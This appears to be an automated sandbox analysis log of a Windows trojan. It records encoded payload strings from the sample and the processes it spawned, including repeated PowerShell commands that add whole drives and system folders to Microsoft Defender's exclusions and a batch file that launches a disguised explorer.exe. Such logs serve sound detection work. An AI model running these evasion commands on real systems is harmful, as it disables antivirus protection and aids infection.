                    Source: CPNSQusnwC.exe, E32.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                    Source: CPNSQusnwC.exe, s67.csBase64 encoded string: 'H4sIAAAAAAAEAAEGBfn6XQUYCxBwcQEMSwEABwpVVgcaCgsOCBEJC1pzbHshJSFrcn0tLH8qenl8YjRrcW4udAhoe2B5Py8nLxQOWQEFCw1cCRweAwMfBxURBRscGk4XFBsWDxUIRg4e+ezn7fC+6ujv4OSw7+z866vi5uH95fOs7Ov79e/7++2bx9fNwNaEi4r2m4mWj5+agIGQn5bqhJWCm4uOnpGc4PPj+OGQt7Oi6rTm6fX9qPyz5ODg+eW04br07uLp6/O+1tDVztbchd/RjI7TiIzW29LLidGrxdTN2pSbkpDTmZBvZm5mKmZpajNtY3hvYnxrPnJ9fi96Y2N0dnVwMn5xchtTTUFISl4JS0ZHEE9CR0FSUEFWGlZZWgNbU1VdU11abiItLmZpZBh5a3BpISwnI342PTwzOTN5OzY3YDg0LTwPEwZNBwoLXAccHgcDAgVBEx4fSAYaFBsXAVQYExBFHO/o7OHl9uOp6+bnsO7k4O7+8ve99/r7teW1uKitrqeqxcLGjpDAw8OFnZLJlYDPm4fXn4uF0dTU24GO2N/Z2J36uuCc9Of85Zy7v67u4eyQ4fPo8bq+tL6wv7i+s7q/uoGOh4uIgICJg4aOiYmLiZ+XmpydzriTg5m0m4iXoZCaamNjb2ZkbWh4ZWljYGpmanN1c395cHNyeXN0cnF1cyVtRFZCaURVTHRHQ0lCSERLVltfXl9FVVlUSV9ZV1FTUSsuJywtLSkhLSpwHz4iIAM5PzkPOjM4PTA0MTM0MDU9CgoJAgYLAgQGBwUMDQoBCBIfFxYXTyQYFhAUJxIWFBLv7urv4+rt5Ovm7uLv5+Tp9fP0/Pn59Pvy/vzz96fM8M7IzP/Kw87Fx8HDxs3Iws3f2cLZ1tfa09vX3djS3M7RpK6mqbT/hK6mqKSoqY6mrrm/jr22s7i2vbW3tLG4t7KIjZKOg4+IjYeZgoOchoWAnJuCks6lnpaWjZWWoJOQj2hxbnNjamdsYGFgaGRmZWd9eHV0dX5/fXZycn1yeSRLb291RkZ5SEFOR0hOQEtKQFVYXVtRW11dUVtUVl1ZVFYlKSgrJS8kfREmOCQlESAuOz47Mj03ODIoOj8/Py0yNgoMCwIJCwcODwsPGwEODFUpHgAcHSkYFh4bGRkWDRwP5uDm7+/o7urr5eLg6ejh6/3w//Dy+fWt1fju88v88vPF1f7NzMvAxsbCxMTPy8vA1tPW19PW393W1NLV2tPV266go6f+hqmupquruKmRoKa9vb26sr6xvbm+vbOys721i4mFhICNh4uFioSNh4GF1aSDl4mbh6a6pJeTl5uekJdlbXJgbGtlYm1gemJ8ZGRufHt5cXh3dXh6dSBcXWhqd3xPTUZIT0JLTFlERkhPTUdfX1tWWFxSUFdbXl9aW1hTIS14BgsWGikrIy8nKj0iPzw0MDc+PzM5NDUqMT8/MjIKCgQAAgMIAlIjCxMUIQcNFQMGCigbGhAVCRkLGxEOEefl7eLo5+Hi5+Xu7u3n6Oz8//ry8vSsxPn//8v98cLxwcnNz9TDws7JxcDMxsvGwN3Y2tje19vQ0tDe19/Z0ND6hLqsoLC15eTrlfnu9+yOvL3yhqewpKT69fiE7//k/bSTl4bGmMrFjo/Y3NmJ1tvdwMGVzdjCwJrB18KYmMjSYTJmZWFkZDRtaDtuLjd1LU8hMCk2Rm9kbHx3O3hvd2lFAw4BexQEHQoLV1a8XYO5BgUAAA==', 'H4sIAAAAAAAEADSbx3KEShZE/2W2LPBuifem8fBW2AYa7+HrH5qJUUSFUJuium7dzJMK6Z9//iNjq8L8/0u/aS75+lf1A9HNeKDHIPdzI+n9pG9SXAw6pGXliHf85saePL+/AP18PJYBmTjJ/RFDP2f/+5hxezU8O8KNXjklS2PoNdqOAkXLUmDYhdiMDaIUnKAPIM6/HXwqFKM8CQ6OIoCPIwpDBKDpIi1zkPiybCByhXgAaCLuAeKARDyC4FC5x2i624m7eo8T2q/ezqK3+fBXgpJ77GnbEb4VotnnlyM63y7zbLrX81ntNCAQUGt71c9hktTRxYpb/8wrqEtSqT52fJHtZRxv5WJ98qiBmxLLo6fGD77rDCyKpQd8NXU2Umwem001hj4J4C8OBEWS+ZkKdh9/vtAcee+3axntdLwODCC6gIAIesg8r0veUATssEj7E0V/AlyQwH4VOMukM0icfy7HUJu7ZZceFgPDQRkQizgptKUs1XTkZ5uvA3H1O6eRFP0koGQ0h3LAx/tZFcHttNDSw76yCVqopukgxqEWE82ae60XOzQqtXj6SKIF6lxCjfeug9PH4AZTREoLaIUWaA+IkpweAs2Ae6JYufRGmN3AaGDB4jtDgOQ90OpAmwJuCJqZFDpn7oK584jJl6ZAnPxa15az9bxOBZbkXgdNp4KjL/J5uvtBI6hh67pIk9ZuxH2w5/MpubdBs/KZvB3Ap94HNSCfq86LNDafxbsD/Oat8h7MNAiS9VLY1lFlEI2SKKXb7ZBzgbwSshh3jeCHVnDJdHx8lqmjJvCTeQt+AV3l6hABlNV3IPjUqkaRIsE887JroZNNsGM6kA/cnop7oOXZqxDg626Q7SCQhNo2FvFJOBoh/Bm5Opea2+JZYrROey9oAo02hAaGbaPMpd7yYGnpvF9gFOuyBvSPIsKX9DnnPewhwOkR0NDTKtazSlj8cgoJms1ahGaHzxra6I3vwQD2b7vF0mHPLUEx84GuochXt1phEjfAy8ldGfX5hmBuCIcJUzCOb6fXbjrqEeNUUB9gRHqUIiELqwGVlo9quGwpuYTjZLtP7+hcwPRMOX5/2soU/sxYrfr5kHT/vq9BL4/QA863UhVSXd9uUi2gBX+UHK3iP7Ou45uPIcuMWh9eetjOefel8Hi5p4/dCj5e4K68K4251wzCTmXJx/ffPW4HbAVI7ikFyhc/johi5qUDgKfAEq/37OWZu7o3cMhJK5/+6la
                    Source: CPNSQusnwC.exe, 8B6.csBase64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
                    Source: CPNSQusnwC.exe, 76n.csBase64 encoded string: 'gaK08ImycXieRwh53u5ZbFYbkCWusNktkmUsBfHiciJh5cs3HbubEhcJb1Jgl0JIe3eVnxDUEuq3cqW8yUb4QYwwXI/z3ERbwA2E0G/y4XKPKeseYm1tqkcx7BXACwmV2+vPQEOFHDUhBiZIcTPgjUk76PJz6438tCaRNSKUdYuMQGEwFK0du8aMT9jKEZwsxHNqeZ9J3xazU5pGXYKPYV86ldBCUBA/3xm2gshY/J8='
                    Source: CPNSQusnwC.exe, 7YK.csBase64 encoded string: 'ggaYeou8+KJfzcPZZg6uhN1BHFxrAgtr5gJJMY6/kL+ZVUhUG9nk4rL0aYBgmkwuhCL56tfxPSyqaVqdTkfedaD1jm/KH9ujrOEqt/VkLqlR07KvSgEsdSFA4vRIZHETPcElzf8XVkT/EUa+QjyakSERICTPMpF49vTcrCC/5/rCY2gRKMbkjrx5gJYqGwP8qx40YRXJ5mEaznP3SBy/WdRNfWV7j3ZCjqYS0/vdqUArq83IMTffUWrD+gAvMIt+Uv6lxcWHXZCHpNx7BSumz3pD3AAzdUNRPZ/LLx64vhK/IfzbKPBMc7sxiSENqBXXnogQeirMXRepYHNz7TIniuqb58KOlaEyGxlBFO1REAi9JC9IDbW4pS/sJbcF5jaQq+uR+Y93NyflpHDZ+A4C6lnEK1Iohf+HRnLV0wHs0zdeoFwlERXNXIjbQgL7iJ2vUiZBb1D5dtBbZ0x3qQ1xNCmqGHRA/RyVBfDk5gQkEEuzfr+Y88E6+6bR+P8OOByP7IzI+OWCzmhBBkdct94x2wfEY9UM86cZ70FAEEOXA73vOl6cMWor6IZOZ/JBNZ1fjq0HhfEEDevDhLS0UgiMPJH/5NHazPAjKQfQ7q3rV2d7kKNVOhYr6EBPDnJTtReRxqhR7patb/EE2nnnKf44Cm19l2HLMrC92QgGeaMDsJ4ahLQLSVguzyl4Vq5bW5J/H8urYXfPHQc1Uf/VfwrlQ84T+iZqoq/tnokf2fgehyOobke8CyyFXoBWlkwiQagr02Mjb/rmLDYXFT74sTtIM4DOuhuP/y0X7FA79wS3AF/sjBVbNpr8JnvANbn2BLcFQVvR4KwTZWplQK8Rowky0cFbgkejS2dwhfpQcWthBHml13lFe/kHVaxPnWAP2UqC8WifX01MzDS8aBj5J82Z30BuQK6vXIAi0VELgJSnC5x52kQE9CoitnuMZdMd3Amfd1ogElug++hpQllbzCGDJAzFbr1NOBuF0YXfhGkE24hXj2OPfnmglE3lshY4aZNi', 'xCUHfx1hDIm8KYj8QbGrdWHGQfArwFyvt61GNTARNP3f9IuXQM5p8bla4O09wKu7U0OOhcu7bzdOclGHvmakKIxSVaL8dAeDe6LI3f0xb8OJ7W8SIsNJuKwLD63HRwea'
                    Source: CPNSQusnwC.exe, 52Z.csBase64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@82/143@0/1
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\bvfQbQIf.logJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Local\5f4504307f363e68f0558d6ac524302b9a3972a38384428f8af4023ee520bec9
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\AppData\Local\Temp\Oa0Kaz5Bd7Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qWYjuUdv6Q.bat"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                    Source: CPNSQusnwC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: CPNSQusnwC.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: CPNSQusnwC.exeReversingLabs: Detection: 76%
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile read: C:\Users\user\Desktop\CPNSQusnwC.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\CPNSQusnwC.exe "C:\Users\user\Desktop\CPNSQusnwC.exe"
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qWYjuUdv6Q.bat"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe"
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qWYjuUdv6Q.bat" Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe"
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: ktmw32.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: propsys.dllJump to behavior
